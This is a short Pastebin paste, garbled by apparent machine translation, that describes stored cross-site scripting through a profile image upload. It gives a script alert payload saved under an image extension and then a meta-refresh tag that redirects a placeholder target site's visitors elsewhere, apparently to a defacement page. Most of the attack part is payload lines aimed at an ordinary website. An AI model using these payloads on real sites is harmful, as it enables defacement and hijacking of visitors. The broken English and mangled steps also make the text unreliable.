Advertisement
Kyfx

xss image upload

May 22nd, 2015
428
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.83 KB | None | 0 0
  1. Today, we salute the people of AST XSS injection image I will finish.
  2. Target site
  3. http://www.hədəfsayt.com/profil?action=new_image
  4. This is a text document, open the site into a profile photo upload bolumudurBiz write alert message:
  5. <script>alert(’Kyfx’)</script>
  6. It adopted the text document formats such as PNG, JPG and others. memory write, upload to the site after downloading a file photo at edəkSayta, for example:
  7. http://www.hədəfsayt.com/profil?image=sekil.png
  8. It shows us the shape of the alert message on the site of the injection, XSS image varBəs can we do it?
  9. The best method bilərikIcinə alert code meta father wrote the text of the document is open silək things sitting out there that I added code to upload a photo. Meta code:
  10. <meta http-equiv="refresh" content="0;URL=http://www.saytadı.com/indexinadı.html">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement